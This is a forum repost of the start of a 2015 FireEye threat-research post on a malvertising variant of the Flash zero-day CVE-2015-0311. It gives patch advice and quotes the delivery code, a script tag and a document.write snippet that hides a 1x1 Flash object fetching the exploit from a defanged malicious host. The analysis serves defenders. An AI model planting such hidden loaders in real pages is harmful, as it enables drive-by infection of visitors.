A Different Exploit Angle on Adobe's Recent Zero-Day

[Nytro]

A Different Exploit Angle on Adobe's Recent Zero-Day

January 27, 2015 | By Dan Caselden, Corbin Souffrant, James T. Bennett | Exploits, Threat Research

The Angler Exploit Kit (EK) recently incorporated a zero-day exploit (CVE-2015-0311) as discussed on Jan. 21 by Kafeine (http://malware.dontneedcoffee.com/2015/01/unpatched-vulnerability-0day-in-flash.html). OnJan. 24, FireEye encountered a variant of this exploit packaged in a completely different way. The following is a technical discussion of this sample and its contrast to that provided by the Angler EK.

Mitigation

Adobe has released a patch addressing CVE-2015-0311. Applying this security patch will prevent this and any other samples relying on CVE-2015-0311 from successfully exploiting victim machines.

New Variant HTML/Javascript Attack Vector

The exploit is being served through advertising banners on adult websites, including one Alexa top 1000 site. The Flash exploit is loaded by plain Javascript generated from php that appears to be devoid of any environmental checks or obfuscations that are typically indicative of the Angler EK:

<script type="text/javascript" src="http://neteasymarketing[.]biz/tracking.php"></script>

----

document.write('<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param name="movie" value="http://neteasymarketing[.]biz/banner/fcf5e938398090608dbdd0ac8c382207.swf" /><!--[if !IE]>--><object type="application/x-shockwave-flash" data="http://neteasymarketing[.]biz/banner/fcf5e938398090608dbdd0ac8c382207.swf" width="1" height="1"></object><!--<![endif]--></object>');

Articol complet: https://www.fireeye.com/blog/threat-research/2015/01/a_different_exploit.html